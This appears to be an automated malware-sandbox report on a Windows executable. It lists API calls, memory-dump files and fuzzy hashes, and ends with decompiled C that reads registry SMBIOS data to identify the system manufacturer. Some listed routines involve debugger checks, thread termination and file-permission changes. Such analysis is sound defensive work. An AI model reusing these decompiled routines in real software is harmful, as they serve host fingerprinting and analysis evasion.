                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E84056
                                                                    • CloseHandle.KERNEL32(00EE3B80,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E8407C
                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E84086
                                                                    Strings
                                                                    • excpetion at sepcifing fh index 1, xrefs: 00E8406F
                                                                    • excpetion at sepcifing fh index, xrefs: 00E840A8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseDeleteHandle$CreateInformationQuerySystem
                                                                    • String ID: excpetion at sepcifing fh index$excpetion at sepcifing fh index 1
                                                                    • API String ID: 2855194821-3318450557
                                                                    • Opcode ID: 520a2f084cc325bc532b7fb13c46e5370c2e9b794cd8f5ad8d239402e60340b2
                                                                    • Instruction ID: 37b571de60a694225621ee05e74426b0d001113fce9a95ad7b2db99ef75e2e5c
                                                                    • Opcode Fuzzy Hash: 520a2f084cc325bc532b7fb13c46e5370c2e9b794cd8f5ad8d239402e60340b2
                                                                    • Instruction Fuzzy Hash: 6C4129B1E0020A9FDB10EBA5DC46BBEB7F5EF48315F141079EA0DB7281DB3659058B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB559C
                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,00EB4134,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EBF640
                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00EB4134,?,?,?,00000055,?,-00000050,?,?), ref: 00EBF66B
                                                                    • _wcschr.LIBVCRUNTIME ref: 00EBF6FF
                                                                    • _wcschr.LIBVCRUNTIME ref: 00EBF70D
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EBF7D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                    • String ID: utf8
                                                                    • API String ID: 4147378913-905460609
                                                                    • Opcode ID: 39612208930b2ffac11716231232a8ca2e9b0dda55ae79a140b7a68c057d765e
                                                                    • Instruction ID: 20c3f5c47d280d80c3ee4f341b75238f8cdc85292f77bcac714fa8cd7250b771
                                                                    • Opcode Fuzzy Hash: 39612208930b2ffac11716231232a8ca2e9b0dda55ae79a140b7a68c057d765e
                                                                    • Instruction Fuzzy Hash: 9F71D531600716AADB25AF75DC46BEB73E8EF49704F14647AF905FB181EA70ED4086A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(00000000), ref: 00E85E4D
                                                                    • WaitForSingleObject.KERNEL32(00000000,00000514), ref: 00E85E5B
                                                                    • NtTerminateThread.NTDLL ref: 00E85E7E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E85E83
                                                                    • CreateThread.KERNEL32 ref: 00E85EA1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E85EB1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E85EBA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Event$ResetThread$CloseCreateHandleObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 1318836089-0
                                                                    • Opcode ID: f650b3620f54f552883fa76d9946af6c0087ab32049faec4c79a41bf8ede49da
                                                                    • Instruction ID: a8886e1c130b168fa14822310755d36e0725336dbaccee44bae022ac43549862
                                                                    • Opcode Fuzzy Hash: f650b3620f54f552883fa76d9946af6c0087ab32049faec4c79a41bf8ede49da
                                                                    • Instruction Fuzzy Hash: 5E5159B1C04748DFCB20CFA5C945B9EBBF5EF48710F10826AE855A7291EB71AA09CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(00000000,2B749D79), ref: 00E8607D
                                                                    • WaitForSingleObject.KERNEL32(00000000,00000514), ref: 00E8608B
                                                                    • NtTerminateThread.NTDLL ref: 00E860AE
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E860B3
                                                                    • CreateThread.KERNEL32 ref: 00E860D1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E860E1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E860EA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Event$ResetThread$CloseCreateHandleObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 1318836089-0
                                                                    • Opcode ID: 2abac10067fbc8a81747a13c928bad4c0fc364447c28935ea9d66b65347e3850
                                                                    • Instruction ID: 171a6869e352bf47b4d32da583dde46b8f7fccad4111a69e67fcf41870b08b26
                                                                    • Opcode Fuzzy Hash: 2abac10067fbc8a81747a13c928bad4c0fc364447c28935ea9d66b65347e3850
                                                                    • Instruction Fuzzy Hash: DF514A75D04348DFCB208FA5D845BDEBBB5EB48710F10822AE859B7390DB71A945CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(?,2B749D79,00000000), ref: 00E862E7
                                                                    • WaitForSingleObject.KERNEL32(?,00000514), ref: 00E862F5
                                                                    • NtTerminateThread.NTDLL ref: 00E86318
                                                                    • CloseHandle.KERNEL32(?), ref: 00E8631D
                                                                    • CreateThread.KERNEL32 ref: 00E86341
                                                                    • ResetEvent.KERNEL32(?), ref: 00E86351
                                                                    • ResetEvent.KERNEL32(?), ref: 00E8635A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Event$ResetThread$CloseCreateHandleObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 1318836089-0
                                                                    • Opcode ID: df3688dd2187e87d91a65b56b5035728cfe7110ba4be303269f6a8b21dde5a2b
                                                                    • Instruction ID: 567104f7f32fc958239c9c98931edac6212976c2db9f560c98a8921203fdbbeb
                                                                    • Opcode Fuzzy Hash: df3688dd2187e87d91a65b56b5035728cfe7110ba4be303269f6a8b21dde5a2b
                                                                    • Instruction Fuzzy Hash: D9418B71904209EFCB109FA5CC59B9EFBB5FF48710F10422AE819B3290DB76690ACF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00EC0044,00000002,00000000,?,?,?,00EC0044,?,00000000), ref: 00EBFDBF
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00EC0044,00000002,00000000,?,?,?,00EC0044,?,00000000), ref: 00EBFDE8
                                                                    • GetACP.KERNEL32(?,?,00EC0044,?,00000000), ref: 00EBFDFD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: caad9e47476bf93278686f7cb49dfda17d0282780d824c6b6267190aea07e6ce
                                                                    • Instruction ID: c2cddb772dce8e3b439dd62ba9b88024b9625e55a5ab5e0bedb9a404336ddb10
                                                                    • Opcode Fuzzy Hash: caad9e47476bf93278686f7cb49dfda17d0282780d824c6b6267190aea07e6ce
                                                                    • Instruction Fuzzy Hash: AA210732A00101AEEB318F24CC01BE7B3A6EF54B6CB569174EA0AFB114E732DE41C390
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB559C
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB555B
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB5591
                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EC0007
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00EC0050
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00EC005F
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EC00A7
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EC00C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                    • String ID:
                                                                    • API String ID: 949163717-0
                                                                    • Opcode ID: 1dc1753f8f65cb7680d34cd70e65cb370ca626b240255bfd7abb2a61e0459e6e
                                                                    • Instruction ID: 2b709d711300cfd2d621028b2b595b2a04098c543bdbd9edf36b96e1c6f18e10
                                                                    • Opcode Fuzzy Hash: 1dc1753f8f65cb7680d34cd70e65cb370ca626b240255bfd7abb2a61e0459e6e
                                                                    • Instruction Fuzzy Hash: DC515972A00209AEDB20DFA5DC42FFBB3B9AF09704F055439F514FB190EB729A458B60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,00EDB7CC,00EDB7CC,2B749D79), ref: 00E64953
                                                                    • FindClose.KERNEL32(00000000), ref: 00E649B6
                                                                      • Part of subcall function 00E86F30: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000), ref: 00E86F54
                                                                      • Part of subcall function 00E86F30: SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 00E86F97
                                                                      • Part of subcall function 00E86F30: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,00000000,00000000), ref: 00E86FAB
                                                                    • FindFirstFileW.KERNEL32(?,?,00EDB7D4), ref: 00E649A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$FileFirstInfoNamedSecurity$CloseEntries
                                                                    • String ID: }j
                                                                    • API String ID: 1633892402-3888656095
                                                                    • Opcode ID: cedc60e8a5494e55e2d338425d6984be3322253659d37e80eef834ea865e65e1
                                                                    • Instruction ID: 2d1e48980c6ad919930b8c38feca62c31752a973fbba3cc47b0393715b303c01
                                                                    • Opcode Fuzzy Hash: cedc60e8a5494e55e2d338425d6984be3322253659d37e80eef834ea865e65e1
                                                                    • Instruction Fuzzy Hash: 0F216B7054420DEFCF04DF69D895AEA7BF8EF14354F504629F826A7290EB31A64ACF80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(2B749D79), ref: 00E61921
                                                                    • NtSetInformationProcess.NTDLL(?,00000004), ref: 00E61935
                                                                    • GetCurrentProcess.KERNEL32(00000021,00EEF9D4,00000002,?,00000004), ref: 00E61A37
                                                                    • NtSetInformationProcess.NTDLL(?,00000004), ref: 00E61A46
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentInformation
                                                                    • String ID:
                                                                    • API String ID: 2491907881-0
                                                                    • Opcode ID: 568574e7cc4b616b99d0ea366dfc11a60f5f65f45daa22dd2ce991d20bf92fd1
                                                                    • Instruction ID: 7ddcc6c8d2860e403bcba0974fcbb11013b04b4b11bb654c9568edb8b72df4ce
                                                                    • Opcode Fuzzy Hash: 568574e7cc4b616b99d0ea366dfc11a60f5f65f45daa22dd2ce991d20bf92fd1
                                                                    • Instruction Fuzzy Hash: 0C519D72D40208DFDB11DFA9D885BEEBBB4FF48724F18926AE41577280D7716940CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EA85BA
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00EA8686
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EA86A6
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00EA86B0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 5e8ad4c0ae6edcfbc37de5aeccbffdb7c93d9d3f1e994d1b100507e09f91cec5
                                                                    • Instruction ID: c5f27036b90a4844c185eaa6a08de8b5fa6607a9737881f6d929eb658c99d060
                                                                    • Opcode Fuzzy Hash: 5e8ad4c0ae6edcfbc37de5aeccbffdb7c93d9d3f1e994d1b100507e09f91cec5
                                                                    • Instruction Fuzzy Hash: DD310975D052189FDB21DFA5D989BCDBBF8AF08304F1041AAE409AB260EB719A85CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetServiceStatus.ADVAPI32(00F2BFAC), ref: 00E58FB1
                                                                    • GetCurrentProcess.KERNEL32(0000001D,00000005,00000004), ref: 00E58FDD
                                                                    • NtSetInformationProcess.NTDLL ref: 00E58FEC
                                                                    • SetServiceStatus.ADVAPI32(00F2BFAC), ref: 00E5900D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProcessServiceStatus$CurrentInformation
                                                                    • String ID:
                                                                    • API String ID: 373973029-0
                                                                    • Opcode ID: 3594577e6c79021f7a2e01e71e087c8ac9be83df98315b1bc938c0327dba9777
                                                                    • Instruction ID: ec28a560125289851a09f0861204f343f105752420b32ca152a426434959b557
                                                                    • Opcode Fuzzy Hash: 3594577e6c79021f7a2e01e71e087c8ac9be83df98315b1bc938c0327dba9777
                                                                    • Instruction Fuzzy Hash: 5801847060910CEFC714EFA5ED49B5DBBB5EB08711F000169ED056B290CB72195ADF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00E890C0(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                    				signed int _v8;
                                                                    				int _v12;
                                                                    				void* _v16;
                                                                    				int _v20;
                                                                    				int _v24;
                                                                    				long _v28;
                                                                    				intOrPtr _v32;
                                                                    				int _v36;
                                                                    				CHAR* _v40;
                                                                    				intOrPtr _v44;
                                                                    				void* _v48;
                                                                    				intOrPtr* _v52;
                                                                    				intOrPtr _v56;
                                                                    				signed int _t74;
                                                                    				long _t77;
                                                                    				long _t80;
                                                                    				void* _t85;
                                                                    				intOrPtr _t87;
                                                                    				char _t88;
                                                                    				char _t89;
                                                                    				intOrPtr _t90;
                                                                    				int _t94;
                                                                    				signed int _t96;
                                                                    				void* _t105;
                                                                    				int _t114;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr* _t120;
                                                                    				CHAR* _t121;
                                                                    				int _t125;
                                                                    				char* _t126;
                                                                    				CHAR* _t128;
                                                                    				CHAR* _t129;
                                                                    				char* _t132;
                                                                    				void* _t134;
                                                                    				void* _t135;
                                                                    				signed int _t136;
                                                                    				void* _t137;
                                                                    
                                                                    				_t74 =  *0xeef074; // 0x2b749d79
                                                                    				_v8 = _t74 ^ _t136;
                                                                    				_v40 = __ecx;
                                                                    				_t132 = 0;
                                                                    				_v48 = 0;
                                                                    				_v24 = 0;
                                                                    				_v32 = 0x80;
                                                                    				_t128 = 0;
                                                                    				_v12 = 0;
                                                                    				_v20 = 0;
                                                                    				_v36 = 0;
                                                                    				_t77 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data", 0, 1,  &_v16);
                                                                    				if(_t77 == 0) {
                                                                    					_t80 = RegQueryValueExW(_v16, L"SMBiosData", 0,  &_v12, 0,  &_v20);
                                                                    					_v28 = _t80;
                                                                    					if(_t80 != 0) {
                                                                    						L8:
                                                                    						RegCloseKey(_v16);
                                                                    						if(_v28 == _t128) {
                                                                    							_t125 = _v24;
                                                                    							_t134 = ( *(_t125 + 6) & 0x0000ffff) + 8;
                                                                    							_t119 = ( *(_t125 + 4) & 0x0000ffff) + 8;
                                                                    							_v44 = _t119;
                                                                    							_t85 = _t134 + _t125;
                                                                    							if( *((char*)(_t134 + _t125)) != 0x7f) {
                                                                    								while(_t134 < _t119) {
                                                                    									_t120 = _t125 + _t134;
                                                                    									_t135 = _t134 + ( *(_t85 + 1) & 0x000000ff);
                                                                    									_v52 = _t120;
                                                                    									_t114 = 1;
                                                                    									do {
                                                                    										_t87 =  *_t120;
                                                                    										if(_t87 != 1) {
                                                                    											if(_t87 != 2) {
                                                                    												if(_t87 != 3 || _t114 != 1) {
                                                                    													goto L27;
                                                                    												} else {
                                                                    													_t96 = ( *(_t120 + 5) & 0x000000ff) + 0xfffffffe;
                                                                    													if(_t96 > 0xc) {
                                                                    														L57:
                                                                    														_t128 = "(Other)";
                                                                    														goto L28;
                                                                    													} else {
                                                                    														switch( *((intOrPtr*)(_t96 * 4 +  &M00E893A8))) {
                                                                    															case 0:
                                                                    																_t128 = "(Unknown)";
                                                                    																goto L28;
                                                                    															case 1:
                                                                    																goto L28;
                                                                    															case 2:
                                                                    																goto L28;
                                                                    															case 3:
                                                                    																goto L57;
                                                                    															case 4:
                                                                    																goto L28;
                                                                    															case 5:
                                                                    																goto L28;
                                                                    															case 6:
                                                                    																goto L28;
                                                                    															case 7:
                                                                    																goto L28;
                                                                    															case 8:
                                                                    																goto L28;
                                                                    															case 9:
                                                                    																goto L28;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    												goto L58;
                                                                    											} else {
                                                                    												if(_v36 == 1 && (( *(_t120 + 4) & 0x000000ff) == _t114 || ( *(_t120 + 5) & 0x000000ff) == _t114 || ( *(_t120 + 6) & 0x000000ff) == _t114)) {
                                                                    													_t128 = _t135 + _t125;
                                                                    												}
                                                                    												goto L27;
                                                                    											}
                                                                    										} else {
                                                                    											if(_v36 != 0 || ( *(_t120 + 4) & 0x000000ff) != _t114 && ( *(_t120 + 5) & 0x000000ff) != _t114 && ( *(_t120 + 6) & 0x000000ff) != _t114) {
                                                                    												L27:
                                                                    												if(_t128 != 0) {
                                                                    													L28:
                                                                    													_t121 = _t128;
                                                                    													_t49 =  &(_t121[1]); // 0x1
                                                                    													_t126 = _t49;
                                                                    													do {
                                                                    														_t89 =  *_t121;
                                                                    														_t121 =  &(_t121[1]);
                                                                    													} while (_t89 != 0);
                                                                    													_t50 = _t121 - _t126 + 1; // 0x2
                                                                    													_t90 = _t50;
                                                                    													_v56 = _t90;
                                                                    													if(_v32 > _t90 + 1) {
                                                                    														_t129 = _v40;
                                                                    														_t94 = wsprintfA(_t129, "%s ", _t128);
                                                                    														_t137 = _t137 + 0xc;
                                                                    														_v40 =  &(_t129[_t94]);
                                                                    													}
                                                                    													_v32 = _v32 - _v56;
                                                                    													goto L33;
                                                                    												}
                                                                    											} else {
                                                                    												_t128 = _t135 + _t125;
                                                                    												if(lstrcmpiA(_t128, "System manufacturer") != 0) {
                                                                    													goto L27;
                                                                    												} else {
                                                                    													_v36 = 1;
                                                                    													L33:
                                                                    													_t128 = 0;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										_t125 = _v24;
                                                                    										_t114 = _t114 + 1;
                                                                    										do {
                                                                    											_t88 =  *(_t135 + _t125);
                                                                    											_t135 = _t135 + 1;
                                                                    										} while (_t88 != 0);
                                                                    										if( *(_t135 + _t125) != _t88) {
                                                                    											goto L37;
                                                                    										}
                                                                    										break;
                                                                    										L37:
                                                                    										_t120 = _v52;
                                                                    									} while (_t135 < _v44);
                                                                    									_t119 = _v44;
                                                                    									_t134 = _t135 + 1;
                                                                    									_t85 = _t134 + _t125;
                                                                    									if( *((char*)(_t134 + _t125)) != 0x7f) {
                                                                    										continue;
                                                                    									}
                                                                    									break;
                                                                    								}
                                                                    							}
                                                                    							_t132 = _v24;
                                                                    						}
                                                                    						if(_t132 != 0) {
                                                                    							HeapFree(_v48, 0, _t132);
                                                                    						}
                                                                    					} else {
                                                                    						if(_v20 == 0 || _v12 != 3) {
                                                                    							_v28 = 0x3f2;
                                                                    							RegCloseKey(_v16);
                                                                    						} else {
                                                                    							_t105 = GetProcessHeap();
                                                                    							_v48 = _t105;
                                                                    							_t132 = HeapAlloc(_t105, 0, _v20);
                                                                    							_v24 = _t132;
                                                                    							if(_t132 != 0) {
                                                                    								_v28 = RegQueryValueExW(_v16, L"SMBiosData", 0, 0, _t132,  &_v20);
                                                                    								goto L8;
                                                                    							} else {
                                                                    								_v28 = 8;
                                                                    								RegCloseKey(_v16);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					SetLastError(_v28);
                                                                    					return E00EA7663(_v8 ^ _t136);
                                                                    				} else {
                                                                    					SetLastError(_t77);
                                                                    					return E00EA7663(_v8 ^ _t136);
                                                                    				}
                                                                    				L58:
                                                                    			}








































                                                                    0x00e890c6
                                                                    0x00e890cd
                                                                    0x00e890d6
                                                                    0x00e890da
                                                                    0x00e890dc
                                                                    0x00e890f0
                                                                    0x00e890f8
                                                                    0x00e890fb
                                                                    0x00e890fd
                                                                    0x00e89100
                                                                    0x00e89103
                                                                    0x00e89106
                                                                    0x00e8910e
                                                                    0x00e8913e
                                                                    0x00e89144
                                                                    0x00e89149
                                                                    0x00e891ab
                                                                    0x00e891ae
                                                                    0x00e891b7
                                                                    0x00e891bd
                                                                    0x00e891c8
                                                                    0x00e891cb
                                                                    0x00e891d2
                                                                    0x00e891d5
                                                                    0x00e891d8
                                                                    0x00e891e0
                                                                    0x00e891ec
                                                                    0x00e891ef
                                                                    0x00e891f1
                                                                    0x00e891f4
                                                                    0x00e89200
                                                                    0x00e89200
                                                                    0x00e89204
                                                                    0x00e89257
                                                                    0x00e89321
                                                                    0x00000000
                                                                    0x00e89330
                                                                    0x00e89334
